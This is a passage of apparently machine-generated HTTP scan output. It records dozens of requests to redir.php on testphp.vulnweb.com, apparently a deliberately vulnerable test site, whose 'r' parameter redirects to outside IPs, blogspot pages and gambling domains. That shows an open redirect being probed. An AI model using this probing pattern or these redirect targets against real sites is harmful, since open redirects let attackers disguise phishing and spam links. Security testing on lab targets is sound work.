slot-tertinggi-arsip%2F\",\"time\":\"340.435967ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:33.651113433Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fwww.w3.org\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fwww.w3.org\",\"location\":\"http://www.w3.org\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fwww.w3.org\",\"time\":\"356.028502ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:34.06120879Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http3A2F2Fwww.naturosante.com2Fadserver2Fadclick.php3Fbannerid3D8926zoneid3D026source3D26dest3Dhttp3A2F2Fwww.aiki-evolution.jp2Fyy-board2Fyybbs.cgi3Flist3Dthread\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http3A2F2Fwww.naturosante.com2Fadserver2Fadclick.php3Fbannerid3D8926zoneid3D026source3D26dest3Dhttp3A2F2Fwww.aiki-evolution.jp2Fyy-board2Fyybbs.cgi3Flist3Dthread\",\"location\":\"http3A2F2Fwww.naturosante.com2Fadserver2Fadclick.php3Fbannerid3D8926zoneid3D026source3D26dest3Dhttp3A2F2Fwww.aiki-evolution.jp2Fyy-board2Fyybbs.cgi3Flist3Dthread\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http3A2F2Fwww.naturosante.com2Fadserver2Fadclick.php3Fbannerid3D8926zoneid3D026source3D26dest3Dhttp3A2F2Fwww.aiki-evolution.jp2Fyy-board2Fyybbs.cgi3Flist3Dthread\",\"time\":\"348.447422ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:34.073096209Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http:%2F%2Fholylandexperience.com%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http:%2F%2Fholylandexperience.com%2F\",\"location\":\"http://holylandexperience.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http:%2F%2Fholylandexperience.com%2F\",\"time\":\"353.972613ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:34.29313884Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http:%2F%2Fmqcedarsprings.com%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http:%2F%2Fmqcedarsprings.com%2F\",\"location\":\"http://mqcedarsprings.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http:%2F%2Fmqcedarsprings.com%2F\",\"time\":\"352.834436ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:34.814957161Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http:%2F%2Fwww.ket789.net\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http:%2F%2Fwww.ket789.net\",\"location\":\"http://www.ket789.net\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http:%2F%2Fwww.ket789.net\",\"time\":\"356.548687ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:34.889037363Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://128.199.210.168/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://128.199.210.168/\",\"location\":\"http://128.199.210.168/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://128.199.210.168/\",\"time\":\"344.472331ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:36.550378947Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://134.209.36.68/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://134.209.36.68/\",\"location\":\"http://134.209.36.68/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://134.209.36.68/\",\"time\":\"344.213335ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:37.85916289Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://139.59.225.235/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://139.59.225.235/\",\"location\":\"http://139.59.225.235/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://139.59.225.235/\",\"time\":\"339.175613ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:37.878061933Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://139.59.236.11/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://139.59.236.11/\",\"location\":\"http://139.59.236.11/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://139.59.236.11/\",\"time\":\"350.78634ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:38.212087892Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://157.245.151.10/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://157.245.151.10/\",\"location\":\"http://157.245.151.10/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://157.245.151.10/\",\"time\":\"351.750318ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.073489059Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://157.245.202.229/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://157.245.202.229/\",\"location\":\"http://157.245.202.229/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://157.245.202.229/\",\"time\":\"347.807438ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.100050964Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://159.203.38.182/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://159.203.38.182/\",\"location\":\"http://159.203.38.182/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://159.203.38.182/\",\"time\":\"343.900951ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.146130209Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://165.22.32.44/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://165.22.32.44/\",\"location\":\"http://165.22.32.44/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://165.22.32.44/\",\"time\":\"356.441831ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.159736935Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://167.172.90.227/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://167.172.90.227/\",\"location\":\"http://167.172.90.227/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://167.172.90.227/\",\"time\":\"353.720916ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.469428277Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://167.99.225.95/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://167.99.225.95/\",\"location\":\"http://167.99.225.95/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://167.99.225.95/\",\"time\":\"349.262851ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.5062345Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://188.166.90.238/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://188.166.90.238/\",\"location\":\"http://188.166.90.238/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://188.166.90.238/\",\"time\":\"349.273684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.510025005Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://178.128.83.31/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://178.128.83.31/\",\"location\":\"http://178.128.83.31/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://178.128.83.31/\",\"time\":\"357.653362ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.583260951Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://1auto.hu\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://1auto.hu\",\"location\":\"http://1auto.hu\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://1auto.hu\",\"time\":\"346.531001ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.638353688Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://1domino1.vip/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://1domino1.vip/\",\"location\":\"http://1domino1.vip/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://1domino1.vip/\",\"time\":\"353.023125ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.740547697Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://206.189.150.114/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://206.189.150.114/\",\"location\":\"http://206.189.150.114/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://206.189.150.114/\",\"time\":\"338.589081ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.804651743Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://24newslive.press\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://24newslive.press\",\"location\":\"http://24newslive.press\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://24newslive.press\",\"time\":\"351.123016ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.838168421Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://2bkeyboardtop.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://2bkeyboardtop.blogspot.com/\",\"location\":\"http://2bkeyboardtop.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://2bkeyboardtop.blogspot.com/\",\"time\":\"352.402062ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.887703927Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://2bkeyboardtop.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://2bkeyboardtop.blogspot.com/management.html\",\"location\":\"http://2bkeyboardtop.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://2bkeyboardtop.blogspot.com/management.html\",\"time\":\"348.639484ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:39.97907365Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://3dconcreteprinting1.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://3dconcreteprinting1.blogspot.com/\",\"location\":\"http://3dconcreteprinting1.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://3dconcreteprinting1.blogspot.com/\",\"time\":\"361.583391ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:40.050835526Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://3dconcreteprinting1.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://3dconcreteprinting1.blogspot.com/management.html\",\"location\":\"http://3dconcreteprinting1.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://3dconcreteprinting1.blogspot.com/management.html\",\"time\":\"345.525356ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:40.135068706Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://abdulwahid675.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://abdulwahid675.blogspot.com\",\"location\":\"http://abdulwahid675.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://abdulwahid675.blogspot.com\",\"time\":\"351.958552ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:43.348078913Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://aboutblogging.org/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://aboutblogging.org/\",\"location\":\"http://aboutblogging.org/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://aboutblogging.org/\",\"time\":\"344.202674ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:43.492816635Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://adwqaz.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://adwqaz.blogspot.com\",\"location\":\"http://adwqaz.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://adwqaz.blogspot.com\",\"time\":\"347.560983ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:43.600047709Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://aems.edu.sd/lms-user_profile/424%5Cn/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://aems.edu.sd/lms-user_profile/424%5Cn/\",\"location\":\"http://aems.edu.sd/lms-user_profile/424\\\\n/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://aems.edu.sd/lms-user_profile/424%5Cn/\",\"time\":\"339.785441ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:43.6426539Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://aems.edu.sd/lms-user_profile/424/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://aems.edu.sd/lms-user_profile/424/\",\"location\":\"http://aems.edu.sd/lms-user_profile/424/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://aems.edu.sd/lms-user_profile/424/\",\"time\":\"352.042899ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:43.995745828Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://agen-judi.site/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://agen-judi.site/\",\"location\":\"http://agen-judi.site/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://agen-judi.site/\",\"time\":\"342.797777ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:44.407964686Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://agenpokerhoki.info/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://agenpokerhoki.info/\",\"location\":\"http://agenpokerhoki.info/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://agenpokerhoki.info/\",\"time\":\"344.747161ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:44.429767432Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ageofanythingvc.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ageofanythingvc.blogspot.com/management.html\",\"location\":\"http://ageofanythingvc.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ageofanythingvc.blogspot.com/management.html\",\"time\":\"354.095848ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:44.647954441Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://akhandtrading.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://akhandtrading.blogspot.com\",\"location\":\"http://akhandtrading.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://akhandtrading.blogspot.com\",\"time\":\"352.437197ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:45.164828184Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://alexisn41g0.glifeblog.com/4054588/rumored-buzz-on-the-best-rv-batteries-near-me/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://alexisn41g0.glifeblog.com/4054588/rumored-buzz-on-the-best-rv-batteries-near-me/\",\"location\":\"http://alexisn41g0.glifeblog.com/4054588/rumored-buzz-on-the-best-rv-batteries-near-me/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://alexisn41g0.glifeblog.com/4054588/rumored-buzz-on-the-best-rv-batteries-near-me/\",\"time\":\"348.322458ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:45.23121846Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://alittleinnonpleasantbay.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://alittleinnonpleasantbay.blogspot.com/\",\"location\":\"http://alittleinnonpleasantbay.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://alittleinnonpleasantbay.blogspot.com/\",\"time\":\"340.408591ms\",\"a\":[\"44.228.249.3\"],\"